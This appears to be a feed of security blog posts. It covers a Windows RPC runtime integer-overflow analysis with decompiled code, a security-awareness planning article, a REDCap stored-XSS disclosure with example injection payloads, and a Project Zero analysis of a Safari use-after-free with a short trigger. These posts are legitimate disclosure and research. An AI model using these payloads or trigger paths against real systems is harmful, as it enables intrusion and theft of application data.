At this point, it’s possible to write a PoC following the previous constraints, the PoC has been tested against my RPC Server using ncacn_np protocol.

With the poc seems to be impossible to trigger the vulnerability due some checks in ProcessReceivedPDU(): Basically the check, that makes impossible to overflow the integer, is executed on the queue messages size.

OSF_SCALL::ProcessReceivedPDU()
{
  ...
              iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
              if (iVar8 == 0) {
                    /* integer overflow! */
                *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
                if (((pkt_flags & 2) != 0) &&
                   (*(undefined4 *)(this + 0x21c) = 3, ((byte)this[0x2e0] & 4) != 0)) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
                if (*(longlong *)(this + 0x18) != 0) {
                  if ((*(uint *)(this + 0x250) == 0) ||
                     ((*(uint *)(this + 0x24c) < *(uint *)(this + 0x250) &&
                      (*(int *)(this + 0x21c) != 3)))) {
                    if ((3 < *(int *)(this + 0x264)) &&
                       ((*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 &&
                        (uVar9 = 0, *(int *)(this + 0x21c) != 3)))) {
                      *(undefined4 *)(this + 0x2ac) = 1;
                      uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1
                    }
                  }
                  else {
                    *(undefined4 *)(this + 0x250) = 0;
                    SCALL::IssueNotification((SCALL *)this,2);
                  }
                  RtlLeaveCriticalSection(pOVar3);
                  return uVar9;
                }
                if (((3 < *(int *)(this + 0x264)) &&
                    (*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0)) &&
                   (*(int *)(this + 0x21c) != 3)) {
                  *(undefined4 *)(this + 0x2ac) = 1;
                  uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1; My code entered heres
                }
                RtlLeaveCriticalSection(pOVar3);
                SetEvent(*(HANDLE *)(this + 0x2c0));
                return uVar9; // 
              }
  ...

When ProcessReceivedPDU() returns 1, it stops to listen for new messages so the client cannot trigger vulnerability anymore.

LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
      }
LAB_18003d2b5:
      if (iVar4 == 0) {
LAB_18003d3c3:
        (**(code **)(*this + 0x38))(); -> OSF_SCONNECTION::TransAsyncReceive() continues to read from the descriptor new packets
      }
      REFERENCED_OBJECT::RemoveReference(this);
      goto LAB_18003d2c5;
    }

In order to not enter the critical paths that lead the server stopping listen for new packets, in the same connection of course, it’s required that one of these should not be satisfied:

3 < *(int *)(this + 0x264) // number of queued packets
*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 // don't know
*(int *)(this + 0x21c) != 3  // can be unsatisfied on the packet with last fragmente flag enabled

*(this + 0x21c)  is set to 3 if the packets has the last fragment enabled.

The number of queued packets is incremented on a PutOnQueue() and decremented on a TakeOffQueue(), at most the queue could contain 4 packets. To me this was so strange because the application was multithread but looked like a monothread just because I did’t see any TakeOffQueue() called during my experiments.

int __thiscall QUEUE::PutOnQueue(QUEUE *this,void *param_1,uint param_2)
{
  ...
  *(int *)(this + 0xc) = iVar6 + 1;
  **(void ***)this = param_1;
  *(uint *)(*(longlong *)this + 8) = param_2;
  return 0;
}


undefined8 QUEUE::TakeOffQueue(longlong *param_1,undefined4 *param_2)
{
  int iVar1;
  
  iVar1 = *(int *)((longlong)param_1 + 0xc);
  if (iVar1 == 0) {
    return 0;
  }
  *(int *)((longlong)param_1 + 0xc) = iVar1 + -1;
  *param_2 = *(undefined4 *)(*param_1 + -8 + (longlong)iVar1 * 0x10);
  return *(undefined8 *)(*param_1 + (longlong)*(int *)((longlong)param_1 + 0xc) * 0x10);
}

In general my thought on the server status was the following:

  1. A Thread running somewhere in the DispatcRpcCall() after the packet that forced to call DispatchRpcCall() has been received, i.e. constrants number 3.
  2. A Thread continuing to read from the medium, did not know from.

So, I inspected better DispatcRpcCall().

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
    uVar3 = RpcpConvertToLongRunning(this,param_2,param_3);
    bVar7 = (int)uVar3 != 0;
    if (bVar7) {
      uVar1 = 0xe;
    }
    else {
      this = (longlong *)param_1[0x26];
      uVar1 =  OSF_SCONNECTION::TransAsyncReceive(); // this should wake up a thread to handle new incoming packet
    }
    if (uVar1 == 0) {
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      DispatchHelper(param_1);
      if (*(int *)(pOVar6 + 0x18) == 0) { // this is the (this + 0x130) + 0x18)
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
      pcVar4 = OSF_SCALL::RemoveReference(); // calling this means that the connection is over!
    }
    else {
      uVar3 = param_1[0x1c] - 0x18;
      if (uVar3 != 0) {
        BCACHE::Free((ulonglong)this,uVar3,param_3);
      }
      if (bVar7) {
        CleanupCallAndSendFault(param_1,(ulonglong)uVar1,0);
      }
      else {
        CleanupCall(param_1,uVar3,param_3);
      }
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::AbortQueuedCalls(pOVar6);
        pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      }
  ...
}

int OSF_SCONNECTION::TransAsyncReceive(longlong *param_1,undefined8 param_2,undefined8 param_3)

{
  int iVar1;
  
  REFERENCED_OBJECT::AddReference((longlong)param_1,param_2,param_3);
  if (*(int *)(param_1 + 5) == 0) {
                    /* CO_Recv */
    iVar1 = CO_Recv(); // return true if a packet has been read
    if (iVar1 != 0) {
      if ((*(int *)(param_1 + 3) != 0) && (*(int *)((longlong)param_1 + 0x1c) == 0)) {
        OSF_SCALL::WakeUpPipeThreadIfNecessary((OSF_SCALL *)param_1[0xf],0x6be);
      }
      *(undefined4 *)(param_1 + 5) = 1;
      AbortConnection(param_1);
    }
  }
  else {
    AbortConnection(param_1);
    iVar1 = -0x3ffdeff8;
  }
  return iVar1;
}

ulonglong CO_Recv(PSLIST_HEADER param_1,undefined8 param_2,SIZE_T param_3)

{
  uint uVar1;
  ulonglong uVar2;
  
  if ((*(int *)&param_1[4].field_0x8 != 0) &&
     (*(int *)&param_1[4].field_0x8 == *(int *)&param_1[4].field_0x4)) {
    uVar1 = RPC_THREAD_POOL::TrySubmitWork(CO_RecvInlineCompletion,param_1);
    uVar2 = (ulonglong)uVar1;
    if (uVar1 != 0) {
      uVar2 = 0xc0021009;
    }
    return uVar2;
  }
  uVar2 = CO_SubmitRead(param_1,param_2,param_3); // ends in calling NMP_CONNECTION::Receive
  return uVar2;
}

According to my breakpoints, TransAsyncReceive() is executed and this led the server in waiting for a new packet after the packet that led to DispatchRpcCall(). If it, TransAsyncReceive(), returns 0 then the packet should has been read and handled by another thread, indeed it proceds calling DispatchHelper(). At this point, I imagined two threads:

  1. A thread started from TransAsyncReceive() that handle new packet and lead to enter in the ProcessReceivedPDU() continues to read until it not returns 1.
  2. A Thread that enters in DispatchHelper().

So, I started to track the memory at (this + 0x130) + 0x18 to identify where it’s written to 1. Because if it is not 0 then the condition that lead ProcessReceivedPDU() returning 1 is not satisfied anymore then it continue to read and because if it is 0 then a TakeOffQueue() is executed from DispatchRpcCall().

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
  ...
}

void __thiscall OSF_SCONNECTION::DispatchQueuedCalls(OSF_SCONNECTION *this)
{
  longlong *plVar1;
  undefined4 local_res8 [2];
  
  while( true ) {
    RtlEnterCriticalSection(this + 0x118);
    plVar1 = (longlong *)QUEUE::TakeOffQueue((longlong *)(this + 0x1b8),local_res8); // decrement no. queued messaeges 
    if (plVar1 == (longlong *)0x0) break;
    RtlLeaveCriticalSection();
    OSF_SCALL::DispatchHelper(plVar1);
    ...
  }
  ...
  return;
}

(this + 0x130) + 0x18 is set to 1, during the association request at offset rpcrt4.dll+0x38b99, just if the packet flag multiplexed is not set.

void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{

        if ((tcp_received->pkt_flags & 0x10U) == 0) {
          *(undefined4 *)(param_1 + 0x18) = 1;
          *(byte *)((longlong)pppppvVar21 + 3) = *(byte *)((longlong)pppppvVar21 + 3) | 3;
        }
}

So, setting the RPC_HAS_PIPE in the server interface and specifying MULTIPLEX flag during the connection, it is under client control, will lead the code into the vulnerable point. At this point the debugger enters in the OSF_SCALL::GetCoalescedBuffer() that is another vulnerable call.

The code enter here from this stack trace:

rpcrt4.dll+0xb404d in OSF_SCALL::Receive()
rpcrt4.dll+0x4b297 in RPC_STATUS I_RpcReceive()
rpcrt4.dll+0x82422 in NdrpServerInit()
rpcrt4.dll+0x1c35e in NdrStubCall2()
                      NdrServerCall2()
rpcrt4.dll+0x57832 in DispatchToStubInCNoAvrf()
rpcrt4.dll+0x39e00 in RPC_INTERFACE::DispatchToStubWorker()
rpcrt4.dll+0x39753 in DispatchToStub()
rpcrt4.dll+0x3a2bc in OSF_SCALL::DispatchHelper()
                      DispatchRPCCall()

So using this PoC we enter every n packets in the coalesced buffer triggering the second integer overflow.

The routine OSF_SCALL::GetCoalescedBuffer() is reached just because the server has RPC_HAS_PIPE configured. Analyzing the stack trace from the last function before OSF_SCALL::GetCoalescedBuffer() I searched some constraints I satisfied that led me to the vulnerable code.

long __thiscall OSF_SCALL::Receive(OSF_SCALL *this,_RPC_MESSAGE *param_1,uint param_2)
{
  ...
      while (iVar3 = *(int *)(this + 0x21c), iVar3 != 1) { // this+ 0x21c seems not set to 1 in ProcessReceivedPDU, did not found where it is
        
        if (iVar3 == 2) {
          return *(long *)(this + 0x20);
        }
        if (iVar3 == 3) { // it is equal to 3 on the last frag packet, from ProcessReceivedPDU
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4);
          return lVar2; // last frag received -> no more packets will be waited!
        }
        // if the total queued packets length is less or equal to the allocation hint received than wait for new data
        if (*(uint *)(this + 0x24c) <= (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8) { 
          EVENT::Wait((EVENT *)(this + 0x2c0),-1); // wait for other packets
        }
        else { 
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4); // run coalesced buffer
          if (lVar2 != 0) { // error
            return lVar2;
          }
          ...
        }
        ...
      }
  ...
}

// (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8 is set during the association request
void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{
  ...
    uVar18 = *(ushort *)((longlong)&tcp_received->alloc_hint + 2);
    if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
      uVar26 = *(uint *)&tcp_received->cxt_id;
      uVar23 = uVar23 >> 8 | uVar23 << 8;
      uVar18 = uVar18 >> 8 | uVar18 << 8;
      *(ushort *)((longlong)&tcp_received->alloc_hint + 2) = uVar18;
      *(uint *)&tcp_received->cxt_id =
           uVar26 >> 0x18 | (uVar26 & 0xff0000) >> 8 | (uVar26 & 0xff00) << 8 | uVar26 << 0x18;
      *(ushort *)&tcp_received->alloc_hint = uVar23;
    }
    puVar24 = (undefined4 *)(ulonglong)uVar23;
    uVar14 = (ushort)*(undefined4 *)(*(longlong *)(param_1 + 0x20) + 0x4c);
    uVar3 = 0xffff;
    if (uVar23 != 0xffff) {
      uVar3 = uVar23;
    }
    if (uVar3 <= uVar18) {
      uVar18 = uVar3;
    }
    if (uVar18 <= uVar14) {
      uVar14 = uVar18;
    }
    *(ushort *)(param_1 + 0xb8) = uVar14 & 0xfff8; // set equal to the allocation hint & 0xfff8 of the first association packet!
  ...
}

Basically from OSF_SCALL::Receive() the code continuosly waits for new packets until a last fragment packet is received or any error is found.

GetCoalescedBuffer() is called if the last fragment is received or if the total len accumulated during the ProcessReceivedPDU() is greater than the alloc_hint, for these condition every n packets it is called.

So, just increasing the fragment length in the PoC it’s possible to trigger GetCoalescedBuffer() without setting MULTIPLEX. Moreover, OSF_SCALL::Receive() is reached because Message->RpcFlags & 0x8000 == 0

RPC_STATUS I_RpcReceive(PRPC_MESSAGE Message,uint Size)
{
  ...
    if ((Message->RpcFlags & 0x8000) == 0) {
                    /* get  OSF_SCALL::Receive address */
      pcVar5 = *(code **)(*plVar7 + 0x38);
    }
    else {
                    /* get NDRServerInitializeMarshall address */
      pcVar5 = *(code **)(*plVar7 + 0x48);
    }
                    /* call coalesced buffer */
    uVar2 = (*pcVar5)();
  ...
}

void NdrpServerInit()
{
  ...
    if (param_5 == 0) {
      if ((*(byte *)(*(ushort **)(puVar2 + 0x10) + 2) & 8) == 0) {
        ...

        ...
        if ((param_2->RpcFlags & 0x1000) == 0) {  // During my tests this value was 0 each time, didnt searched when this could fail
        param_2->RpcFlags = 0x4000;               // makes to call GetCoalescedBuffer()
        puStackY96 = (undefined *)0x180082427;
        exception = I_RpcReceive(param_2,0);
        if (exception != 0) {
                    /* WARNING: Subroutine does not return */
          puStackY96 = &UNK_180082432;
          RpcRaiseException(exception);
        }
        param_1->Buffer = (uchar *)param_2->Buffer;
        puVar10 = (uchar *)param_2->Buffer;
        param_1->BufferStart = puVar10;
        param_1->BufferEnd = puVar10 + param_2->BufferLength;
        param_3 = pMVar20;
      }
  ...
}

GetCoalescedBuffer() is used to merge queued buffers to the last received packet that has not been queued, indeed it allocates the total length needed and copy there every queued message then.

long __thiscall OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2)
{
  ...
  iVar5 = *(int *)(this + 0x24c);
  if (iVar5 != 0) {
    if (uVar3 != 0) {
  /* integer overflow */
      iVar5 = iVar5 + *(int *)(param_1 + 0x18);
    }
    lVar2 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this_00,&local_res8,iVar5 + 0x18);
    if (lVar2 == 0) {
      dst_00 = (void *)((longlong)local_res8 + 0x18);
      dst = dst_00;
      local_res8 = dst_00;
      if ((uVar3 != 0) && (*(void **)(param_1 + 0x10) != (void *)0x0)) {
        memcpy(dst_00,*(void **)(param_1 + 0x10),*(uint *)(param_1 + 0x18));
        local_res8 = (void *)((ulonglong)*(uint *)(param_1 + 0x18) + (longlong)dst_00);
        OSF_SCONNECTION::TransFreeBuffer() // free last message PDU received
  ...
      }
      while (src = (void *)QUEUE::TakeOffQueue((longlong *)(this + 600),(undefined4 *)&local_res8), src != (void *)0x0) { 
        // loop to consume the queue merging the queued packets
        uVar4 = (ulonglong)local_res8 & 0xffffffff;
        memcpy(dst,src,(uint)local_res8);
                    /* OSF_SCONNECTION::TransFreeBuffer  */
        OSF_SCONNECTION::TransFreeBuffer() // free PDU buffer queued
        dst = (void *)((longlong)dst + uVar4);
      }
      ...
      *(undefined4 *)(this + 0x24c) = 0;
      ...
}

At this point from the new constraints found merging to the old ones it’s possible to resume the conditions that lead to vulnerable point:

  1. Server configured with RPC_INTERFACE_HAS_PIPES -> integer at offset 0x58 in the rpc interface defined in the server has second bit to 1 - **Not under attacker control **
  2. Client sends a first fragment, that initiliaze the call id object and satisfies the condition to call directly DispatchRpcCall(), sending fragment long just as the alloc hint set in this way: (*(int *)(this + 0x1d8) != *(int *)(this + 0x248) in ProcessReceivedPDU() lead to execute DispatchRpcCall() and so param_1 + 0x214 is set to 1 - Under attacker control
  3. Client continues to send middle fragments until: iVar5 = iVar5 + *(int *)(param_1 + 0x18); overflows and lead memcpy() to overflow the buffer - Under attacker control

Bad points:

  1. fragment length it’s two bytes long, very hard to exploit because it’s time and memory consuming - Under attacker control, Highly constrained
  2. I found no way to cheat on the fragment length value and sent bytes, i.e. they should be coherent between each other.

These lead to send a large number of fragments and consequentely the exploitation could be impossible due to system memory, i.e. the server just before request that overlow the integer should be able, in the coalesce buffer, to allocate 4gb of memory. If the memory is not allocated then an exception is raised. Anyway, assuming that the rpc server could allocate more than 4GB, there is the problem of the time. Indeed the packet’s number to send is very big and the processing time of the packets increase enormously according to the total length of the queued data.

My final is available here PoC, below is shown in the debugger the breakpoint on the vulnerable add operation in the function to coalesce buffers.

Embedding Payloads and Bypassing Controls in Microsoft InfoPath

18 June 2022 at 10:00
While browsing a SharePoint instance recently, I came across an interesting URL. The page itself displayed a web form that submitted data to SharePoint. Intrigued by the .xsn extension, I downloaded the file and started investigating what turned out to be Microsoft InfoPath’s template format. Along the way, I discovered parts of the specification that enabled loading remote payloads, bypassing warning dialogs, and other interesting behaviour.

Why a successful Cyber Security Awareness month starts … now!

17 June 2022 at 08:00

Have you noticed that it’s June, already?! Crazy how fast time flies by when busy. But Q2 of 2022 is almost ready to be closed, so why not have a peak at what the second half of the year has in store for us? Summer holidays you say? Sandy beaches and happy hour cocktails? Or cool mountain air and challenging MBT tracks? Messily written out-of-office messages, kindly asking to park that question till early September?

Yes. It’s all that. But there is more. For us, it’s October that is highlighted.
October is Cyber Security Awareness Month, the peak season for Security Awareness professionals (and enthusiasts 😉). In Europe, the European Cybersecurity Month (ECSM) has taken place every year since 2013 and has been incorporated in the implementing actions of the Cybersecurity Act (CSA). The focus on making it a yearly recurring event is strong and in today’s world we might need this initiative to spotlight security awareness more than ever.

But October is still 3 months away…

3 reasons why a successful Cyber Security Awareness Month starts NOW!

1. Take your time to get inspired

Cyber Security is a specific yet very broad domain. There are endless topics to cover, levels of complexity, target audiences… Needless to say pinpointing your focus for Cyber Month won’t be easy. Depending on available time and budget it may be difficult to pick the best approach. That is why it is important to take your time to get inspired. How? Here some ideas.

  • Take a step back and review what you cover already in the previous quarter. Which topics went down extremely well with your target audience? Which ones didn’t and why?
  • What topics people are already familiar with? It might be a good idea to remind your team of what they already know instead of overwhelming them with only new content;
  • Do not let a good incident go to waste!
    • Make sure to involve the technical teams managing security and dig  for input on “real” incidents. Showing people what happened or might happen makes security more tangible;
    • Use security awareness topics that are trending in the local media as a coat rack for the message you want to bring across;
  • Check what other organizations are talking about this year. Is it relevant for you? No need to reinvent the wheel 😉
  • Keep it simple. Focus on 1 topic and make it really stick.

2. Organizing impactful activities takes time!

Once you have a clear view on the topic to cover and the message you want to bring across, it’s important to consider how you want to do that. And let’s be honest, if you really want to make an impact during Cyber Month, sending a boring email that is all work and no play isn’t going to cut it. There is no magic formula but there are a few things that you could consider:

  • Triggers and motivation: typically cybersecurity awareness month allows us to be more playful than the rest of the year. Why not using different triggers too?
  • Get emotions running: testimonials are among the most relatable tool you can use. Careful with the balance between “scary” and “empowering” stories!
  • Talk to the informed ones: propose an in-depth approach. extra-professional resources, panel discussions, external speakers…
  • Roll up sleeves: Most of us learn by doing. That is why games, experience workshops and 1to1 demos work well.

Make sure you have a good motivation to attract your people.

  • Contests with a final gift are a classic, but you only need to attend a professional fair to see those still work. 
  • Goodies? Require budget. Physical items may draw negative attention by being perceived as wasteful.  Are we against them? No, but choose carefully.
  • Make sure you have a good “how this will improve your life” story. Remember that protecting your family and friends is a better motivator than protecting your company (ok, it is not so much of a secret)

You can read in our blog how we applied all this last year or reach out for a demo.


3. Get your stakeholders on board early

Cyber Month is not a one man/girl/team show. No matter how inspiring your activities, if you are running it alone it will be very difficult to bring your message across. That’s why it is crucial to start promoting Cyber Month early towards all stakeholders. Often even before you have anything planned. Getting all off your ducks in a row before summer will give you peace of mind when organizing and planning later on.

Here’s a few stakeholders to consider and why*:

  • Top Management: money and support!
  • Communications: to make sure you reserve a spot for cyber month on all communication channels (weekly newsletters, intranet, emails, cctv, social media, …);
  • Technical teams: back to the “inspiration” argument. And of course to validate content.
  • HR: to help you define and identify target audiences and DOs / DON’Ts in the organization.

*Depending on the size of organisation there might be more or less stakeholders to consider.

“Opps!  I wish I had read this 2 months ago”

Are you reading this by the 20th September? 0 € on your budget?
Don’t panic. Even with time and money constraints, there is good, generic content freely available on the internet covering at least the top 10 of most current threats. It’s usually even tweakable to make it look and feel branded for your own organisation.

ENISA, the European Union Agency for Cyber Security, coordinates the organisation of the European Cybersecurity Month (ECSM) and act as “hub” for all participating Member States and EU Institutions. The Agency also publishes new materials on yearly basis.

A great resource in Belgium is Safeonweb, an initiative of the Centre for Cyber Security Belgium that also launches a new campaign every year.

If nothing else, these will provide a good starting point. And next year, make sure you start early on!

About the authors

Hannelore Goffin is an experienced consultant within the Cyber Strategy team at NVISO where she is passionate about raising awareness on all cyber related topics, both for the professional and personal context. 

Mercedes M Diaz leads NVISO Cyberculture practice. She supports businesses trying to reduce their risks by helping teams understanding their role in protecting the company.

CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting

15 June 2022 at 09:00

Nettitude identified two stored Cross Site Scripting (XSS) vulnerabilities within Vanderbilt REDCap.  These have been assigned CVE-2022-24004 & CVE-2022-24127.

REDCap is a web application which allows the creation and management of online surveys for research purposes. Version 12.0.11 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the Messenger functionality and the administration interface.

CVE-2022-24004 – Proof of Concept

REDCap has a built in messenger function which allows all registered users to communicate within the application. Each conversation created has a title which can only be edited by the user which originally created the conversation. The input field where this title can be edited does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST data sent to Messenger_ajax.php:

action=change-conversationtitle&amp;thread_id=7&amp;new_title=%22+onclick%3Dalert(document.location)+&amp;username=m17664jp&amp;limit=8&amp;redcap_csrf_token=1c5c586a0e3d614dfba3401a1dd92f508d4f915a

This payload will then trigger in the browser where the messenger sidebar is toggled of any user which is a participant of the conversation. The following screenshot shows that the payload is injected into the data-tooltip parameter of the h4 tag.

For this simple proof of concept, the user would have to click on the message title, resulting in the execution of a JavaScript alert.

Graphical user interface, application Description automatically generated

The impact of this vulnerability could lead to the disclosure of sensitive application and survey data. Given that the messenger functionality will autocomplete usernames after providing the first character, it is possible to see how an attacker could create a conversation with all application users to maximise chances of compromising application data from an administrator user.

Nettitude demonstrated the impact of this to the application vendor by further improving the proof of concept to automatically trigger on page load and scrape the contents of the users screen, sending this data to a remote server.

CVE-2022-24004 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: Messenger_ajax.php
  • Vulnerable parameter: new_title

CVE-2022-24127 – Proof of Concept

In the project administration section of the application, admin users that have permissions to modify a project can modify the project title. The input field where this value is modified does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST Data sent to edit_project_settings.php:

surveys_enabled=1&repeatforms=0&scheduling=0&randomization=0&app_title=a%3C%2Ftitle%3E%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&purpose=0&project_pi_firstname=&project_pi_mi=&project_pi_lastname=&project_pi_email=&project_pi_alias=&project_irb_number=&purpose_other=&project_note=test&projecttype=on&repeatforms_chk=on&redcap_csrf_token=9158988d73045f982cb373f607a607022391e1df

Once the project title is modified, the user is returned to the project administration home page where the payload immediately triggers and will continue to be executed across all administration pages related to the project.

Text Description automatically generated

This code execution is triggered due to the project title being reflected in the page <title> tag. If a user enters a value which first closes the tag, then any further HTML or JavaScript can be executed as shown in the following screenshot.

Graphical user interface, text, application, email Description automatically generated

The impact this vulnerability is reduced because it would require the attacker to have existing access as a user with project administration permissions. An attacker could potentially exploit this issue to redirect the user to a malicious website controlled by the attacker, which may ultimately lead to credential harvesting or the downloading of malware.

CVE-2022-24127 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: edit_project_settings.php
  • Vulnerable parameter: app_title

Conclusion

All areas of a web application which accept and store user input should not be trusted.  Appropriate measures should be taken to sanitize or encode data before being shown in a later browser response.

Nettitude contacted Vanderbilt to disclose these vulnerabilities. Remediation was put in place almost immediately post-disclosure and a remediated version (12.0.13) was promptly released.

A picture containing text Description automatically generated

Timeline – CVE-2022-24004

  1. Discovered by Nettitude: 25 January 2022
  2. Vendor informed: 26 January 2022
  3. CVE Assigned: 26 January 2022
  4. Vendor fix released: 28 January 2022
  5. Nettitude Blog: 15 June 2022

Timeline – CVE-2022-24127

  1. Discovered by Nettitude: 28 January 2022
  2. Vendor informed: 28 January 2022
  3. Vendor fix released: 28 January 2022
  4. CVE assigned: 29 January 2022
  5. Nettitude Blog: 15 June 2022

 

The post CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting appeared first on Nettitude Labs.

An Autopsy on a Zombie In-the-Wild 0-day

14 June 2022 at 16:00

Posted by Maddie Stone, Google Project Zero

Whenever there’s a new in-the-wild 0-day disclosed, I’m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a “zombie” Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you’re interested in the full root cause analysis for CVE-2022-22620, we’ve published it here.

In the 2020 Year in Review of 0-days exploited in the wild, I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we’re seeing a similar trend. Attackers don’t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it’s a little bit different from other variants that we’ve discussed before. Most variants we’ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.

Getting Started

In the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: the patch (thanks to Apple for sharing with me!) and the description from the security bulletin stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue* to a reference-counted pointer, RefPtr<SerializedScriptValue>.

trunk/Source/WebCore/loader/FrameLoader.cpp 

1094

1094

// This does the same kind of work that didOpenURL does, except it relies on the fact

1095

1095

// that a higher level already checked that the URLs match and the scrolling is the right thing to do.

1096

 

void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)

 

1096

void FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)

Whenever I’m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There’s a lot of 0-days to be studied! 😀)

The Previous Life

In the case of CVE-2022-22620, I was scrolling through the git blame view of FrameLoader.cpp. Specifically I was looking at the definition of loadInSameDocument. When looking at the git blame for this line prior to our patch, it’s a very interesting commit. The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The Changelog even states:


(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the

serialized script value state object. No one was passing ownership.

But pass it along to statePopped as a Ref since we need to pass ownership

of the null value, at least for now.

Now I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a commit from 2013 that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled “Use-after-free in SerializedScriptValue::deserialize” and included a good description of how that use-after-free worked.

The commit also included a test:

Added a test that demonstrated a crash due to use-after-free

of SerializedScriptValue.

Test: fast/history/replacestate-nocrash.html

The trigger from this test is:

Object.prototype.__defineSetter__("foo",function(){history.replaceState("", "")});

history.replaceState({foo:1,zzz:"a".repeat(1<<22)}, "");

history.state.length;

My hope was that the test would crash the vulnerable version of WebKit and I’d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn’t crash.

The commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked the Blink rendering engine in April 2013.) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the Chromium bug back in 2013, so I asked him for the details.

The use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the "most recent" history entry.

The bug was that in the implementation of the getter for
state, SerializedScriptValue::deserialize was called on the current "most recent" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.

In order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>.  While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers’ fix also caught and patched the path to deserialize through loadInSameDocument.

The timeline of the changes impacting the stateObject is:

  • HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>
  • HistoryItem::stateObject() returns SerializedScriptValue*
  • FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*
  • HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>
  • HistoryItem::stateObject returns RefPtr instead of PassRefPtr
  • HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr
